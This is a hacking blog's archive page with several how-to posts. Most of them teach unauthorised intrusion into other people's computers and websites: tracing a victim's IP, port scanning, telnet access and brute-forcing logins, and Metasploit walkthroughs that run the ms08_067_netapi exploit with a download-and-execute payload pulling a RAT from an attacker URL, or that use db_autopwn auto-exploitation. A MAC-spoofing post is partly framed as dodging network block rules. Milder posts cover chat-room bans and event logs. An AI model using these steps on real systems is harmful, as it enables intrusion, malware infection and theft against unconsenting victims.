Showing posts with label Computer Hacking. Show all posts
Showing posts with label Computer Hacking. Show all posts

Wednesday, 28 January 2015

How To Remote Computer Using IP address

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

    Confirm the website or a computer you want to hack.
    Find or trace their IP address.
    Make sure that IP address is online
    Scan for open ports
    Check for venerable ports
    access through the port
    Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com

a How to hack remote computer using IP Address

This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

    How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.

Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.

telnet [IP address] [Port]
c How to hack remote computer using IP Address

You’ll be asked to input login information.
d How to hack remote computer using IP Address

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.

In this way you’ll able to hack remove computer using only IP address

Saturday, 7 June 2014

Mac Spoofing Method

Changing MAC address or we also can call it MAC address spoofing will be useful in some cases, but we will talk about it later in conclusion at the end of this article.

Requirement:

1. Linux terminal

Step by step How to Change MAC Address on Kali Linux:

1. Open your terminal, and type

ifconfig | grep HWaddr

you will see your original MAC address, mine was 08:00:27:b2:4d:4b

2. To temporary change our MAC address, we need to turn off the network interface first by running this command

( ifconfig eth0 down )

3. After that we can configure the new MAC address

ifconfig eth0 hw ether 00:00:00:00:00:02


you can change the MAC address using this hexadecimal format XX:XX:XX:XX:XX:XX

4. Now we can turn on the network interface again.

ifconfig eth0 up

5. And the last we can check again our MAC whether it's change or not.

if we follow until this step, MAC address will back to default after we restart our machine. Go to next page to view how to change MAC address permanently.

6. Kali Linux was built based on Debian. In Debian all the network interface was located on /etc/network/interfaces.

7. We will configure the /etc/network/interfaces. In this tutorial I will use pico text editor, but you can choose any of your favourite text editor.

pico /etc/network/interfaces

8. Now we will add one line of script to change our MAC address permanently

pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

This script will be called on system startup.

9. If we want to restore the default MAC address, just add the # sign in front of script in step 8.

#pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

Conclusion:

1. Changing MAC address usually needed for privacy and prevent tracking in the local network about our hardware information(e.g: in public wi-fi network).

2. Some network administrator they make blocking rule in proxy or router by adding the MAC address. To ensure interoperability and preventing being blocked by the proxy or router blacklist rule, we can change our MAC address.

Hope you found it useful

Tuesday, 11 June 2013

How to infect or hack a computer with only IP address

Tutorial - How to infect or hack a computer with only IP address:

Requirements:

Nmap
Metasploit

First of all you need target IP of your victim.

Then open Metasploit Console & type db_create.
[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.
[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>
[This will scan OS, Ports, and Services running on the victim's computer.]
Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the victim's machine.
Exploit depends on the OS, Ports, and Services running on the slave's computer.
So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.
No matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Usage: This will show all targets by exploit]

Now Type set target 0
[Usage: This will set target to 0 specified]
Then type show payloads
[Usage: This will bring up all the payloads]
Next type set payload windows/download_exec
[Usage: This will set the payload as windows/download_exec]

Then Type show options
[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >
[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe
[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit
[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)
So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Now the final question - how to change the shellcode above to get access to someone's Windows 7 or 8? 

Wednesday, 23 January 2013

Hack Any Computer With IP


Hack any computer with an ip (MetaSploit)
I am here to show you this magical tool called metasploit that allows you to hack anyunpatched computer with only its IP .Lets begin

1) First you need to download metaSploit . The most up-to-date version is free at metasploit.com
2) you need Postgrsql for your database . Download from this link,
Download
Make sure you use all the defaults or metasploit woun't work!

3) now lets go down to business... After installing both tools, open up the PostgrSQL admin gui (start -> all
programs -> PostgreSQL 9.0 -> pgadmin III). then right-click on your server (in the left hand box) and click connect . Remember to keep this window open the whole time. you will also need the pass you chose to use in step 5...

4) time for some hacking! Go to start -> all programs -> Metasploit framework , and then open the metasploit gui. Let it load untill it look like this:

5) Now , in the window type:
db_connect postgres: ThePassyouChose@localhost : 5432
The first time you do this you will see lots of text flash buy. Don't wory. this is normal.

6) Type db_host to make sure you are connect correctallly.
7) Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8) Now we get to the fun part; the automatic exploitation , Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play halo for a while, andthen come back...

9) After th exploitation is done, type sessions -1 to see what the scanner found. If all went, you should see a list of exploits.
10) Now we get to use the exploits to hack the computer!!! if you will notice, all of the exploits are numbered , and they all have obvious names (i.e. , reverseScreen_tcp). In order to use an exploit , type this:
sessions-i ExploitNumber

The features of Metasploit are much like a rat. once you get into someone's computer , you can see their screen, controll their mouse, see what they type , see them, etc,,,,,,

Tuesday, 6 November 2012

Ban Computer Hardware OF An Abuser OR Spammer In A Flash Chat.


HOW TO BAN COMPUTER HARDWARE OF AN ABUSER OR SPAMMER IN A FLASH CHAT:-

In Most Of The Online Chat Rooms,If You Ban IP Of An Abuser,He/She Simply Uses VPN Or IP Hiders To change Their IP Address And Come Again To Mess With You.

So,To Completely Restrict/Stop Them From Accessing Your Chatroom,You Will Be Need To "Ban" Or "Block" The Computer From Which They Are Entering To Your Chat.

These Kind Of Ban Usually,Records Their "Hardware ID" Or In Simple Words,Their "MAC Address".Hence Does Not Allow Them To Enter Your Chatroom,Even When They Use Proxies/VPN/IP Changers.

But,Most Of The Chatroom Owner Does Not Know That How Come They Get Abuser's Or Spammer's Hardware ID.So,Guys,I Am Here To Teach And Tell Them That "How To Ban Hardware Of Computer Of An Abuser Or Spammer".

Just Follow The Simple Steps Given Below To Do That.

Step1:Go To Your FlashChat Admin Panel.

Step2:Click Monitor Panel.

Step3:Here You Will Find All Details Of Users Connected To Your Chat Room.

Step4:Copy "SID" Given There In Front Of The Abuser's Name.
(Example: Suppose,Abuser Is ABUSER1,And His "Sid" Is "7c7ad5ba-802a-47b2-af4e-67053cb159a0",As Shown In Picture Given Below.)

Step5:Now,Go To Ban Settings.

Step6:Check "Ban Computer" Option There.

Step7:Paste Sid,Which You Have Copied From "Monitor Panel".

Step8:Set Ban Expire Time.

Step9:Click Save,To Save The Changes And Ban That Abuser.

His Computer Will Be Banned From Your Site,And He Will Not Be Able to Access Your Chatroom,Even When He Use VPN Or Proxies.

You Can Also,Ban His USERNAME And IP ADDRESS From The Same Option That Is "Ban Settings".As Shown In Above Picture

Wednesday, 5 September 2012

How to know who used your PC/Laptop in your absence

How to know who used your PC/Laptop in your absence 

Now easily find out, who used your PC/Laptop in your absence, without using any software.
Just follow these simple steps:

start >> run >>eventvwr.msc

Events are stored in three log files: Application, Security, and System.
These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
Double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.